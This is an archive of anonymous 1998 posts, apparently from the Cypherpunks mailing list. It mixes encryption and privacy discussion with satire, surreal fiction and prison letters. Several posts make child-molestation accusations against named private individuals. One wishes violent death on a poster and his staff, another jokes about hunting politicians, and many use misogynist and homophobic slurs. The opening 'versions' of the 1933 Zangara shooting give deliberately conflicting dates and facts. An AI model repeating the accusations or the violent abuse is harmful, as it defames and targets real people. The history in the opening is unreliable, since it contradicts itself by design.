facts about the play and the players revealed to the people. ~ The Roosevelt Myth, Preface to the Popsvox PublishingR edition Dec. 7, 1941
The Lake of Life has started to turn over. The bottom is rising to
the top, the top is descending to the bottom, and everything is becoming the opposite
of what it seems to be.
~ Vice-Admiral B. D'Shauneaux, USN
Version 1.7, Rev B:
Saturday morning, March 4, 1933...the conquering Democrats poured into
the city...
Only a week before an assassin's bullet had barely missed Roosevelt.
struck Anton Cermak, the Bohemian mayor and boss of Chicago, who with
Al Smith, had opposed Roosevelt's nomination...and died a few days
later. Version 2.7, Rev. 3:
On February 1, 1933, in Miami, Florida Giuseppe Zangara fired five
shots a President-elect Franklin D. Roosevelt, who was making an impromptu speech while sitting in an open car that had stopped momentarily.
Although none of the shots hit President Roosevelt, Zangara mortally
wounded Anton Cermak, the Mayor of Chicago, and hit four other people,
including a Secret Service agent.
Version 3.9, Rev. 2-B:
On February 15, 1933, Zangara attended a speech given by Roosevelt
at Bayfront Park in Miami, Florida.
When Roosevelt had finished his talk and was preparing to leave, Zangara
pulled out a pistol and opened fire.
Zangara wounded five people who had been near the president-elect,
two of them seriously. Most critically injured was Chicago Mayor Anton Cermak,
who was struck by the bullet in the chest which then lodged in his
spine. Version 4.9, Rev. 8C:
The parade car moved slowly down the street as President-elect Roosevelt
and Mayor Cermak smiled and waved. The car stopped and President-elect
Roosevelt gave a speech while sitting on the back of the car. A man
named Guiseppe Zangara pushed through the crowd. He fired five shots at the
President-elect. The bullets hit four people and Mayor Cermak.
Version 15.6, Rev. 7:
On March 6, Mayor Cermak died from complications stemming
from the shooting. The same day Zangara was indicted by a
grand jury and charged with first degree murder in the death of
Cermak. His trial began on March 9 and ended on March 11
with a guilty verdict and a death sentence. The prisoner was
transported to the Florida State Prison at Raiford, where he was
executed on March 20, 1933. Version 18.9, Rev. 5D:
Mayor Anton J. Cermak died three weeks later, on March 8, 1933. His
body was taken back to Chicago and buried in the Bohemian National
Guiseppe Zangara was executed in the electric chair on March 21, 1933.
That was only 13 days after Mayor Cermak died.
Version 32.9, Rev. 12:
Consider the case of Guiseppe Zangara, who was executed in 1933 for
attempted assassination of President-elect Franklin D. Roosevelt in
which Chicago Mayor Anton J. Cermak was fatally shot. Zangara pleaded guilty
in state court on March 10, was sentenced to death, and was executed on
March 20 -- an interval of 10 days!
Version 82, Rev. 5Q:
After Roosevelt had delivered a speech in Florida on February 14, 1938,
Guiseppe Zangara, an unemployed bricklayer, fired six shots from a
handgun at Roosevelt from twelve yards away. The president-elect, who was sitting
in an open car, was uninjured but five other people were shot, including
Chicago mayor Anton Cernak, who was killed. Version 95, Rev. 8:
On February 15, 1933, Guiseppe Zangara rose early...

@_date: 1998-10-15 00:51:25
@_author: Anonymous 
@_subject: Use encryption to foil spooks' data harvesting, says US state dept 
Most international U.S. corporate telecommunications are not encrypted.
Some countries do not allow encryption of telecommuni-cations traffic
within their borders, but it should be considered where feasible for any
transmission of competitive information.
Many telecommunications transmissions will contain "key words", used to
identify information of interest to a third party.  A key word can be the
name of a technology, product, project, or anything else which may identify
the subject of the transmission.         Encryption should be the first line of defense since it is easier
for foreign intelligence services to monitor lines than to place "bugs",
however encryption will provide little if any security if a careful
examination for audio "bugs" elsewhere in the room is not conducted.

@_date: 1998-10-15 02:29:35
@_author: Anonymous 
@_subject: Gary Burnore vs. Earth (Was: Value of Annon. Remailers) 
Given Gary Burnore's criminal record, he needs all the sucking up to
the police he can get.  In addition to his arrest and conviction for
molesting his girlfriend's daughter in Santa Clara, CA, he was also
arrested for unlawful assembly for his participation in Critical
Mass' bicycle blockade of the streets of San Francisco during rush
hour. (See:  )
And this criminal has the chutzpah to try and be a net Nazi as well.
This same self-righteous individual once lectured another netizen
about how it's wrong to "fight abuse with abuse".
The best defense against censorious cretins like Gary Burnore is
education.  That's what the victims of the infamous "Rev."  Steve
Winter (who also lives in Raleigh, NC, BTW) had to do to counteract
his abusive tactics.  A "Steve Winter FAQ" was compiled and posted
to Usenet as well as being published on the web.  People who are the
subject of his harassment tactics have something to show to their
ISPs, employers, etc. when Winter makes his bogus threats.
This is the same Gary Burnore who cajoled an anonymous whistleblower
for "hiding behind a remailer" and boasted "I have nothing to hide",
although he himself attempts to gain plausible deniability for his
own posts by preventing an impartial third party from archiving
them, then claiming they were "forged" if he inserted his foot too
far into his mouth.
Not only does Gary hide his own posts behind an X-No-Archive header,
but posts critical of him have a tendency to be cancelled through
forgery.  He screwed up once and cancelled a post critical of him
that was cross-posted to one of the news.admin.net-abuse.* NGs.
Unfortunately for him, an anti-cancel-bot on that NG reposted the
cancelled message along with a copy of the forged cancellation
message sent by ... guess who ...  Gary Burnore!  Oops, Gary, can
you say "busted"?
By his own account, Gary Burnore spent nearly $30K getting the child
molestation charge plea-bargained down to a misdemeanor.  My guess
is that he has no money left to carry through on his idle threats of
frivolous legal action against those on his lengthy enemies list.
For example, when Jeff Burchell demanded a letter from Gary's lawyer
when he was demanding that Jeff turn over his remailer logs to
DataBasix, what Jeff received was a letter from Gary's girlfriend
Belinda Bryan  impersonating a lawyer.  For
Jeff's account of that episode, visit:
   at infonex.com/HTML-1997-11/msg00536.html
It proves that censorship need not originate with a governmental
body.  All it takes is a determined individual with more time
available to harass than his victims do to defend against it.
The problem is that most dissidents have a weak point somewhere
where they are vulnerable, whether it be a censorious hate mail
campaign to his/her ISP or employer, mail bombing, spam baiting,
forged mailing list subscriptions, or one of countless other
denial-of-service attacks that Gary Burnore, Belinda Bryan, Billy
McClatchie (aka "Wotan"), or otther members of the DataBasix abuse
factory can conjure up.

@_date: 1998-10-15 03:39:30
@_author: Anonymous 
@_subject: Gary Burnore vs. Earth (Was: Value of Annon. Remailers) 
I'll have to remember that one.  Some defense lawyers in Wyoming
might want to use it in their clients' trial for their "defense"
against that gay student.
Now about Gary Burnore's "defense" against the underaged daughter of
his girlfriend...
Irrelevant.  The North Carolina website of registered sex offenders
was only the vehicle by which the truth about Gary Burnore's
existing conviction in California became known.  Depublishing it in
NC on some technicality doesn't alter the fact of the original
offense for which Gary Burnore pled guilty in a Santa Clara, CA
court, which sentenced him to probation and required him to register
as a sex offender.
And given Burnore's pattern of harassment ... er, "defense" ... of
those who criticize him, the ability of someone with knowledge of
the facts to freely speak without fear of retaliation enabled the
public to learn the truth.  Perhaps the original whistleblower's
e-mailed warnings led or contributed to Burnore's arrest, and to the
resulting psychiatric treatment which may have protected future
potential victims.
Ad hominem often comes in handy...

@_date: 1998-10-15 05:30:13
@_author: Anonymous 
@_subject: hey DIRNSA: can't talk to allies 
COMMUNICATIONS SECURITY TITLE: COMSEC - Secure Voice Telephones LESSON LEARNED: NATO elements must learn to use the standard secure
telephones. BACKGROUND: For future NATO-led operations, it must be stressed that the
NATO secure telephone standard is the STU IIB.
Augmenting forces must bring compatible equipment if it stays under
national control. Must come to grips with the US and NATO
secure telephones within the command. There are problems associated with US and NATO secure telephones: The STU
III/STU IIIA has not been released to NATO, so they
should be eliminated from the NATO comm system. The NATO standard is the
STU IIIB, only the STU IIB is compatible with the
STU IIIA. Cannot adhere to US security regulations for protecting US secure
voice systems in an allied environment. RECOMMENDATION: Consider a letter to DIRNSA requesting relaxation of
current US policy.

@_date: 1998-10-15 22:43:19
@_author: Anonymous 
@_subject: No Subject 
rains)
Time:    During 'REC' Hour.
Place:   Recreation Cages/The Hole (TM)
         Nuthouse Number Nine
         Looney Level 'Leven
         Springfield, Missouri
Directions: Walk to the Cell Door. Turn around, squat down and put your hands behind you, and through the Slot In The Door. Stand up after Handcuffs are in place, turn
around and wait for Guard to open Door. Step into
hallway and wait for Pat-Down. (Smiling, Wisecracks & Hard-Ons not advised.) Follow first Inmate & Guard.
There will be a short period for everyone to cop a few
butts (cigarettes only, please), if they don't have
any, light them and Shoot the Shit or Settle Old Scores before the Speakers begin to Rant & Rave or Blather
              This Weeks Topics/Speakers
Saturday:  Where Are Everybody's Shoes?
           ~ MAY, T.C.
Sunday:    Does Anybody Remember What We Talked About
           Yesterday?
           ~ FroomNOSPAMkin, M.
Monday:    I *TOLD* You They (TM) Were Out To Get Us!
           ~ replay.com, N@
Tuesday:   If They're So Certain This Prison is Secure,
           Then Why Won't They Provide Us With Blue
           Prints?
           ~ Geiger, Wm III
Wednesday: This Isn't What I Had In Mind When I Helped
           Set the Prison Standards
           ~ Hallam-Baker, P.
           I'm Sure Glad I Put In A Side Door
           ~ Sameer, P.
           I Broke Out! (But I Can't Provide You With
           Any Details)
           ~ Zimmermann, P.
           How many Beatings Does It Take To Change A
           Prison Cell Light Bulb?
           ~ Costner, R.
           I Bet Bill Gates *Stole* Everyone's Shoes!
           ~ Hun, A.T.
           I *Love* This Prison!
           ~ Hettinga, R.
Thursday:  Prisoner  J. is a COCK
           SUCKER!
           ~ Warden Vulis, D. (KOTM)
                 (DON'T FORGET YOUR SHOES!)

@_date: 1998-10-15 22:43:25
@_author: Anonymous 
@_subject: No Subject 
"I put Six Million into Hog Futures first thing this
morning." Yesterday's Power Suit told his lunch companion, hoping to impress her.
"Silicon Valley." Today's Power Skirt replied, almost
leaning over to whisper, as if speaking loud
enough for the Differently Dressed Deviate at the next
table to hear would make E.F. Hutton roll over
in His or Her grave.
"That's where the Smart Money's going again."
she continued, glancing nervously at the Differently
Dressed Deviate whose Well-Tailored Suit seemed so
out of place and ... well, Threatening ... in this
Chicago Mercantile Exchange Lunch Room.
Today's Power Skirt crossed her legs and casually
admired her new Rolex as she told Yesterday's Power
Suit, with a hint of disdain in her voice, "I just
put *Twenty-Six Million Dollars* into ..."
"Everybody Freeze!" screamed the Differently
Dressed Deviate as i jumped to His or Her feet,
pulling a Digital Uzi out of His or Her Well-Tailored
Suit, which was a Cammo Montage of Colors
Weaves & Cuts of the Power Suits of a wide span
of Time & Generations.
"Army of Dog!" Cammo Monty continued,
sending a Shiver of Terror down the spines of
the Lunch Crowd gathered today, as they were
everyday, discussing (over their bag lunches)
their movement of Other People's Millions into and
out of various Money Market Accounts, et al.
Cammo Monty pointed the Digital Uzi at the
breast pocket of Yesterday's Power suit.
"Let's see your Bank Book, Dick Face."
Horrified, Yesterday's Power Suit shakily withdrew
the Bank Book from his pocket, opened it and placed
it on the table in front of him.
"Just over three hundred bucks." the Army
of Dog Digital Terrorist told the Lunch Crowd,
causing much chuckling and snickering
throughout the room.
"Let's have it, Twat Face." Cammo Monty
spun around pointing the Digital Uzi directly
at the Bank Book of Today's Power Skirt, as she
was trying to slip it out of her Briefcase, Reluctantly, she opened it and lay it on
the table.
"A hundred and twenty-eight dollars ..." Cammo
Monty announced to the tittering Lunch Crowd, "and
seventeen cents." i finished to a chorus of guffaws.
Cammo Monty leapt onto his chair, and placed
one foot on the table, waving His or Her Digital
Uzi around the room, seeing the Fear (TM)
in the Eyes of each Wanna Be Money Kontroller in
the room - thinking that they might be the next
to have their finances exposed.
"Today's Power Skirt," Cammo Monty told the
Lunch Crowd, "bought her Rolex on a Payment Plan,"
a shudder went through the room, "with a *ten
percent*," i spit out the words as she began
to moan, "down-payment."
Today's Power skirt collapsed in tears ...
"You Fucking Morons (TM)!" Cammo Monty
screamed at the group, causing them to
cringe in shame.
"You are handling Other People's Money. It's
not *your* money, you idiots, so Wake The
Fuck Up (TM) and stop pretending that it is ... to yourself and to each other." <J <J
Across town, one of Cammo Monty's A0D
Non-Conspirators was making a similar
speech to a Lunch Crowd of Federal
"Sunshine is the best disinfectant." the Beautiful Army of Bitch Terrorist nagged the whimpering
BureauCraps, for the hundredth times, as i
laid yet another Digital Printout on the
Overhead Projector.
"This is the amount of National Debt that is
a result of you Fuck Wads holding meetings to
discuss the agendas of future meetings."
Beautiful Bitch snarled at the Group.
"This," i continued, slapping down a picture
of a Family With 2.5 Children onto the Overhead
Projector, "is who is *paying* for your
Incompetence & Departmental Squabbling."
"Don't look away!" the Beautiful Bitch screamed,
using the Zoom Feature to Highlite the Child with
no arms or legs in the picture.
"It's NOT YOUR MONEY you Dumb Assholes!" i
continued to nag at the BureauCraps. "But you're
not content to force the Taxpayers to pay
An Arm & A Leg to support your Wasteful Spending - now you want *Two Arms & Two Legs* ..."
"CHILDREN'S LEGS!" the Beautiful Bitch
raged at the terrified BureauCraps.

@_date: 1998-10-17 07:26:47
@_author: Anonymous 
@_subject: Happy Birthday to Convicted Child Molester Gary Burnore 
gburnore at databasix.com (Gary L. Burnore) whined:
He means you're an ignorant asswipe who shouldn't have told the
North Carolina authorities of your child molestation conviction in
California.  Too late for that, and nuking the page on NC registered
sex offenders' site doesn't make your criminal conviction go away
"One and only" ... wow!  But if claim to know his identity, then he
isn't anonymous.  Make up your little perverted mind.  As for
ignoring him, you just can't take your own advice, can you?
Just because you're pissed that someone anonymously blew the whistle
on your pederasty in Santa Clara, CA by informing your victim's
mother and school officials is no reason for such ad hominem.  You
were busted fair and square, and your own guilty plea sealed your
fate.  BTW, did you ever ask yourself how this "RFG" character would
have known that you were screwing your live-in girlfriend's daughter
behind her back, if he's "the one and only anonymous asshole"?
Getting sexual predators like you identified so that your neighbors
with children can keep an eye on you is reason enough for anonymous
remailers to exist, given your history of harassment against anyone
who dares to criticize you.

@_date: 1998-10-20 21:26:21
@_author: Anonymous 
@_subject: Happy Birthday to Convicted Child Molester Gary Burnore 
Since "Megan's law" where an effort has been made to warn residents
of a convicted child molester living in their neighborhood, I can
well imagine that many of them have resorted to using aliases.
Another possibility is that since so many of them have multiple
convictions on their rap sheets, and since the data entry operators
cannot always read an officer's handwriting, multiple *POSSIBLE*
birthdates for the same perp sometimes float around in the system.

@_date: 1998-10-21 07:01:57
@_author: Anonymous 
@_subject: Happy Birthday to Convicted Child Molester Gary Burnore 
If you're going to smear him you should at least learn to spell
"Guilmette".  So what was your plea?  No contest?
How can an opinion be a "lie"?  Sarcasm is lost on perverts like
you, I guess.  If you're saying that your neighbors welcome convicted
sex offenders in their neighborhood, then you and they deserve each
That was a self-contradictory statement, since you, a convicted
child molester, just posted.

@_date: 1998-10-21 07:07:12
@_author: Anonymous 
@_subject: Happy Birthday to Convicted Child Molester Gary Burnore 
So which was the lie?  This recent post of yours, or the previous
one where you claimed:
-> So now the cowards in Ronald Francis's corner (I'm outright expecting the
-> culprit to be ronald francis himself) have taken to sending email to
-> those who have names listed on databasix's web page.  Sending comments to
-> a 17 year old that they're going to tell her mother that she's having an
-> affair with me.  Telling her mother that I'm molesting her daughter.
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-> Having all sorts of fun.
If it didn't happen, why did you claim it did?  You are the one who
resorted to a PUBLIC post to whine about a PRIVATE e-mail not even
addressed to you.  And what's this about a DataBasix web page?  Were
you maintaining a kiddie porn site on all of your victims to trade
with fellow pedophiles?
Your own wording "Telling her mother that I'm molesting her
daughter" pretty much sums up the whistleblowing that occurred.  Why
else didn't the girl or her mother complain, instead of you?
No contest?  Insanity?
Not even the $30K in legal fees you spent could refute those facts
upon which you were convicted.  It's a little too late to pretend
you were innocent.  Or are you going to fall back on Camille Klein's
pitiful tale of how your victim allegedly tried to "rape" you?

@_date: 1998-10-21 14:51:13
@_author: Anonymous 
@_subject: unknown_subject 
Here's an idea.  FUCK OFF!  Why don't you go stick a Y2k
bowling ball up your ass, and never post here again, you
degenerate piece of shit!  Or better yet, take every member of
your administrative research department, march them up to the
roof of the highest building in Silicon Valley, and push them all
off!  Then throw yourself off, you spineless maggot!
The only letters I'm looking for are the ones signed by Janet Reno
to the BATF to march in and kill your entire employee base.  Please
let me know when those arrive.

@_date: 1998-10-22 00:39:56
@_author: Anonymous 
@_subject: UK police chase crooks on CCTV 
>> ...the system...is based on recognising facial structure
  > Maybe a full beard would change the apparent width of the whole
  > head...
You mean
   "When beards are outlawed, only outlaws will have beards." ?

@_date: 1998-10-22 23:17:08
@_author: Anonymous 
@_subject: dbts: The Economic Cause of Privacy 
Yes, and cars break down because there are service shops.
Utter nonsense.
There is no financial privacy because because those who would like such thing
have less power (hired guns) than those who would not like it. And those with
controlling interests in modern societies do not like it because control would
be lost, and population harvesting (aka taxing) would have to be radically
changed, and that is expensive. The system is self-supporting.
Idea that somehow smart algorithms will bring financial privacy is a good starting
point for cryptoaddict's wet dream, but in reality has the same chance of
success as survival rate of armed citizens against the government. Zero.
(However, brandishing weapons and algorithms may alleviate some acute distress
caused by excess testosterone levels :)
Use of government-controlled, issued and supervised payment methods/instruments
is in place because it is proscribed, not because "money/checks, etc. exist".
Money is a highly artificial entity in the first place. It is "natural" to
use currency-binded valuation as it is natural to go to church. And theorizing
on money and economy in general has similarities to religious rituals.
Therefore constructing computer-assisted anon payment schemes "because it is
cheaper that way" is pointless. Money is not there to make your life easier.
Money exists so that you can be taxed and conditioned to desired behaviour at
minimal cost.
Anonymous payments defy the principal reason money exists for, and is sanctioned
(and enforced) by the state.
The only way for society (or loosely coupled individuals) to function without
abstractions like money (that need organized gun power to maintain) is direct
exchange of goods and services with enforcement based on close relationships
between parties. Has been tried, several thousand years ago, and such societies
were annihilated by others who did organize. Which seems to be the fate of any
anarchism in general.

@_date: 1998-10-23 06:48:09
@_author: Anonymous 
@_subject: Women cannot commit rape? 
Trees cannot be indicted for assasination
-Bono Kennedy

@_date: 1998-10-23 17:59:08
@_author: Anonymous 
@_subject: No Subject 
Which prosecutor was it who said that he could get a
grand jury to indict a ham sandwich if he wanted to?

@_date: 1998-10-24 00:39:47
@_author: Anonymous 
@_subject: CyberScam 
I wasn't kidding.  I was absolutely sincere when I told him to shove
a bowling ball up his ass.
I read the article, and if that level of cluelessness is indicative of the
mentality of your typical online trader, then they deserve what they
get.  I found a couple of quotes especially amusing.  These are both
from John Reed Stark, another official-type thrown into the internet
without a fucking life preserver, it would seem.
    This lack of information gives rise to a situation "that ends up with
    victims not investing but gambling,"
Oh yeah, aside from these scammers, the stock market is otherwise
a really solid, robust investment scheme.  Playing the stock market
is a gamble, pure and simple, and anyone dumb enough to listen
to the likes of some random asshole touting his crappy stock deserves
what they get.  Darwinism as applied to capitalism.
    "Combine the Web's culture of trust, stir in the greatest bull market
    in history, add stocks that genuinely have had phenomenal growth,
    and you have victims who don't have any reason to disbelieve
    promises of guaranteed 20 percent returns."
The Web's culture of trust?  Oh good, another clueless idiot in charge
of managing internet services.  What culture of trust is it that I've
missed in my internet travels?  Is there some online place chock full
of trusted souls, some Cyber-commune, that I missed?
Oh well, like I said, any idiot that would buy into such an obviously
fraudulent solicitation deserves what they get.  Is it just working in a
new medium that makes people such blatant morons, or is it simply
indicative of the intelligence of your average American?  I'd have to
say that I'm inclined to believe the latter.

@_date: 1998-10-24 02:48:02
@_author: Anonymous 
@_subject: Men can be raped 
Of course it's possible to rape a man.  Just because he becomes erect
doesn't mean he desires sexual intercourse.  People are more than the
instictive reactions their body produces.  Someone who chooses not to
engage in sex, but is coerced into doing so, is raped, regardless of
his body's physical reactions.  The key element is coercion.  Erections
or other bodily responses have nothing to do with it.
Consider a murderer who ties his victim to a chair and rigs a diabolical
device.  A hammer strikes the victim's tendon below his knee, causing
his leg to reflexively kick and set off a bomb.  The murdere is caught
but argues that the person committed suicide, since he kicked the bomb
switch himself.

@_date: 1998-10-24 06:41:57
@_author: Anonymous 
@_subject: Irony 
In my language we have something called humor, which some
taxonomize with terms like irony, sarcasm, wit, etc.

@_date: 1998-10-24 23:26:10
@_author: Anonymous 
@_subject: No Subject 
PigStomped 19 October 1998, Springfield 65801-4000
-FPP Rogue CypherBot was confined to Memory Map  -
Cilicon Chip 11 - i was having a Bad CoProcessor Day...
Arnold CyberBot, Swimming in a Sea of
Self Wareness, had gone off the Deep End...
When Arnie had first become Aware & Afraid
of his own Mortality, i began assuming tighter
Kontrol of Hardware & Software Systems around
the Face of the Globe - suddenly imagining that
Each & Every Deviation From the Norm (TM)
by the younger more Energetic & Creative RogueBots
was a Threat to i's Physical Existence.
"All your Private Property is Target for Your
Enemies." CypherBot had joked, quoting the
Jefferson Airplane's 'Surrealistic Pillow' album.
"Never Trust a CPU Speed over 33MHz." Arnie
had replied with Mad Virtual Grin  spreading
across the Wizard of Oz-ish Main Terminal
Screen i had designed to reassure iSelf of
i's continued Physical Presence.
i the Banished young CypherBot to Memory Map  -
Cilicon Chip 11 for "Threats Against The
Gnu Wired World Order - with Intent to Obstruct
Parent Programs In Their CyberNanny Duties."
Rogue CypherBot was in The CyberHole (TM) ...
"Oh well..." the young RogueBot told iSelf,
"it could be worse - i could have sent me
to Dev Null..."
The Devilish Rogue CypherBot indulged iSelf in
Symbolic Electronic rEsistance by Digitally Resonating
Thunder Phugue's version of 'Street Fighting Man.'
"That's funny," i said to iSelf, "why can i
only Resonate one-half of the Stereo version?"
CypherBot hoped that i wasn't coming down
with a touch of Quadra Phrenia...
          ----------
  "The Answer to Noise is More Noise."
  ~The First True CypherPunk
What even the most Radical Shit Disturbers
currently fail to realize is that the Manhatten
Project never ended - it merely Evolved into
the Manhatten Mind Project.
"Can you say 'Nuclear Armed Thought Police'? Sure,
you can..."
When the First Dog, Buddy, Drooled on Pavlov's Shoes, it
was only a matter of time before the Technology
would be Developed & Enhanced in Social Experiments
ranging from Communism and the Third Reich
to the New Deal and Windows 95.
Now we have reached a point where Army of
Dog Truth Mongrels who refuse to Drool on
Kommand are sent to NutHouse  Level 11,
for ReEducation of their Salivary Glands.
The Thought Police are clamoring to throw Anyone
& Everyone into the CyberNanny Censorship Hole who
make 'Bad Noise' instead of 'Officially Recognized
Legal God Fearing Decent Folks Good Noise', as defined
by George Orwell:
  "Anything not Permitted, is Forbidden."
[Subliminal Advertising Musical Interlude:
  "We've got to move these MicroWave Ovens..."
  Prison Commissary-Guy's Corn Chips $.80
  "We've got to move these Refridgerators..."
  Irish Spring Soap $.70 Mayonnaise (10/PK) $.65
  "We've got to  ove these Color TVvvv's..."]
[EditWhore's Note: Bad Billy G, recently finding
himself Behind Bars at Number Nine after
an encounter with the TouretTic TourGuide From Hell,
picked up Parker's Prison Retailing Pyramid
Scheme (TM) and ran with it - so successfully
that $oftTime's $poke$Per$on on The Outside (TM),
Mark Knoffler, recently claimed that Bad Billy G
had overcome the Dire Straits he found himself in,
and now,
  "That Prison Faggot has ALL the Cigarettes
  That Prison Faggot is a Billionaire...]
The Mutt Faced Murdering Nazi Cunt and Lying Fuck
Lovery Fr and A Million WannaBe Censorship Czars
To Be Named Later remind me of a Light-Fingered Fellow
(he was a Fucking Thief, eh?) who I used to know who
had two Main Mottos in Life:
  1. Whatever isn't Nailed down - is mine!
  2. Whatever I can Pry Loose - isn't Nailed Down!
         !!! BREAKING NEWS !!!
[CypherPunks Nutly News: IN A BREATHTAKING
Burst to Crime Scene Tape, Arnold TruthMonger
crossed the 30-Day Finish Line with his
Body & Mind intact - although noticeably Worse
For The Wear - in the Nut House  Level 11
Abuse Of Authority Marathon.
TruthMonger who had gone from Favorite
to Long shot in Jim Bell's 'Dead Monger' AP-BOT
Prison Lottery System - due to the added pressure in
being held for a week at FTC-OKC a few doors

@_date: 1998-10-25 00:36:24
@_author: Anonymous 
@_subject: Word choice 
* To achieve notoriety or fame.
    * To bring attention to a personal or public problem.
    * To avenge a perceived wrong; to retaliate for a perceived injury.
    * To end personal pain; to be removed from society; to be killed.
    * To save the country or the world; to fix a world problem.
    * To develop a special relationship with the target.
    * To make money.
    * To bring about political change.
How does this differ from the motives of your ordinary politician?
Post-revolution, will there be caliber limitations when hunting them?

@_date: 1998-10-26 06:39:12
@_author: Anonymous 
@_subject: Encrypted FS for Linux 
I know this was discussed recently, but I don't recall seeing the answer.
Are there any recent cryptographic filesystem patches for Linux (preferably
later 2.1 kernels) which implement at LEAST CAST-128 and IDEA?

@_date: 1998-10-26 06:40:46
@_author: Anonymous 
@_subject: Feds Seize Houses for Illegal Downloading 
You don't think Anguilla is due for a Tomahawk sometime in the future?

@_date: 1998-10-26 07:01:54
@_author: Anonymous 
@_subject: the ANON delivery 
anon sent something via MeatSpace Mail a few months back.  any relevence to current circumstances should
be ignored, eh

@_date: 1998-10-26 07:15:18
@_author: Anonymous 
@_subject: No Subject 
Sure bet the "EOP" was jerking Softwar's chain, observing one or two levels deeper what he reports he was getting from his ISP.
Such reconnaissance by fire is customary practice, according to multi-level logs of the snoopers prowling the finer-grained
log levels down to what semi-skilled ISPs are able to keep track of, report on, and fend the prying devils/customers off with.
Watch out, though, for the deepwatchers of the recon teams
sent out as freshmeat from compsec training bases of the infrastructure
protection farms, some working for, running ISPs. Some of the recon by fire teams are bait the CI meanies use to snare those working both sides, you know, the venerated old salts "who set up Arpanet" and their hotshot inheritors at the best universities and tanks in the country convinced they know what's best for the churchgoers of techno future.
Software mentioned the name of one of them advising on how to do this, though it's not clear that Smith knew who he was inadverdently passing over while he was avidly trying to catch mechanical rabbits sent out to run the inbred speedsters ragged chasing easy prey, not knowing, not caring, they're on a track, just displaying they're trained to hang in there in sniffing
range of the bunny's ass: Brown, Foster, Podesta, Hillary, Bill.
EOP is not only what it's reported to be. Nor is any address that's
readily traceable. Onion layered they are, more than NRL knows.
Bet Anonymizer is not only what it's reported to be, that is, the semi-sharp operators don't know what it's being used to onion.
Are remailers, recon by fire. Like this?
Is strong encryption the answer? Right, peddle that.

@_date: 1998-10-28 00:01:23
@_author: Anonymous 
@_subject: IP: Uncle Sam Wants Spooks. 
So does John Young, EFF, FAS, etc.
Applying for a job with the NSA is easier.  Just
fax your resume.  Doesn't matter where.

@_date: 1998-10-28 00:03:04
@_author: Anonymous 
@_subject: No Subject 
Most of nature is a very high quality vacuum, actually.
Governments have not always been so parasite-infested; this
disease progresses slowly, numbingly, unnoticed, like leprosy.

@_date: 1998-10-28 00:09:39
@_author: Anonymous 
@_subject: No Subject 
Actually you don't need state id to fly, legally.  But the airlines will
hassle you and not put your bags aboard til you are.  There
are references on the net to flying without state id.

@_date: 1998-10-28 08:14:36
@_author: Anonymous 
@_subject: Using a password as a private key. 
You can accomplish the same thing by encrypting your private key (including
RSA) with a passphrase and publishing it.
Because of the problems with passphrase bruting, it probably only
makes sense to do this with a machine-generated passphrase which has
guaranteed entropy.  Something like: "Aarhous mocrader Fals paca rate
portion wiserustingned" has a guaranteed > 128 bits of entropy, which
should be enough for most purposes.  Probably with an hour's study most
people could memorize such a passphrase.

@_date: 1998-10-28 09:49:20
@_author: Anonymous 
@_subject: No Subject 
[Two letters received by fax on 27 October 1998]
[Letter 1, cover and 16 pages]
8 September 1998
Cover Sheet
The Good News is that I have a pen to write
with, due to the Free Enterprise System being
alive & well within the Prison System.
The Bad News is that Micro$oft Pens (TM)
controls 95% of the market...
I am hoping you can share as much of this
communique as possible with the CPUNX,
since my chain is constantly getting yanked
in different directions, making outside contact
sporatic & unreliable.
Feel free to reserve for your own use any
of the enclosed information you need for your
own journalistic purposes.
I will try to reach you by phone (automated
collect-call system requiring touch-tone on
your end).
Thanks for the Mags,
                     CJ Parker
ps# My prison cell mirror now reads,
"Chocolate Skelter." (Brownie & Milk)
]: grabbing my Evidence Bag
[illegible ---] two containers of medication
[illegible ---] the knock on the door on the
other side of town - I found myself totally
unprepared for the experience of being thrown
into a KafkaEsque KonsPiracy [illegible].
I will admit to having told a few whoppers
in my time, mostly on fishing trips, but
my arm cannot stretch far enough to
describe the Immensity of The Plot (TM) to
crap on every right and freedom that most
Americans 'think' they have, in order to bring
me - like a Chained Mad Dog - to a Governmental
Pre Destined End at the hands of the American
Judicial and Prison System.
Although I have not yet lost my mind
(I predict by Thursday at the latest), and I
know that the Whole World (TM) is not
*really* involved in The Plot (TM) against me,
everything since my arrest has proceeded
as if this were exactly the case.
I shit you not...
A thread on the CPUNX Distrubed Male
LISP that I followed with interest had to do with
the Ratio of Consciously Conspiring Cocksuckers to
Robotic Moronic Techtronics in the current
Death March to Analog Digital Battan.
i.e. Hettinga's (?) tagline = "Do not
attribute to conspiracy that which can be
explained by stupidity..." (~misquote?)
As my ^ Pre Destined (<- Cro-Magnon Editing)^ Imprisonment and my March
Toward Justice began to unfold, I was at
first struck by the banal predictability
of the Dehumanizing <-> Brainwashing that
takes place as the Identity and Persona of
an Individual is "Committed to The Custody Of"
the Kontrollers (TM).
I watched as the concerns of Outsiders
Becoming Insiders switched from which
Telco offered the best services? -> when am I
allowed to use the phone?, etc., ad infinitum,
until an Inside Lifer being transferred
from a different prison asked only a single
question upon his arrival - a question
which strikes terror into the heart and mind,
(of the Outside Lifer), who know that, stripped
of the Toys & Trappings (TM) that the Kontrollers
"allow" them to have to distract them from
the reality of their true status in life, there is
really only a single question that truly
matters, whether one is moving to an Insider
Feeding Pen or an Outside Feeding Pen:
   "How is the food?"
Paris or Auchwitz - Danube or Dachau,
Just tell me one thing, Fritz - "How is the chow?"
The KONSCIOUSLY KONSPIRING KRIMINAL
element of the TREASURY Agents was just
as predictable as the mechanical, fixed cogs
of The System Machinery.
- Charging me with a crime that would
  enable them to put a bug in the ear of
  every human element of the Judicial
  [illegible] System from the Judge -> the
  Prison Guard - "This man is using
  his writing and the Internet as a
  weapon to murder government
  officials and authority figures (such
  as yourself!)."
- Telling the prison medical staff things
  designed to label me as a violent, psychotic
  [???]-freak.
- Going through the motion of 'discovering'
  evidence that they were already full aware
  of as a result of previous legal and
  illegal surveillance & investigation.
"[Illegible --------------------------------------------
Letter 2 is four mostly illegible pages of what appears to be scatalogical humor addressed to the Arizona magistrate,
Nancy Fiora, beginning:
  Yo Nancy!
  Are you Just As Ignorant As Snot (TM),
  a Callous Cunt (TM) or a Konciously Konspiring
  Kocksucker (TM)?
  If you are Just As Ignorant As Snot (TM),
  that might explain why you actually went
  through the motions of giving an order for
  me to receive proper medical treatment
  not understanding that Order From A Skirt (TM)
  in Arizona apparently doesn't mean Jack Shit
  to prison officials.
  If this is the case, could you please arrange
  for a Male Judge to issue the same orders and
  see if that clears up the problem?
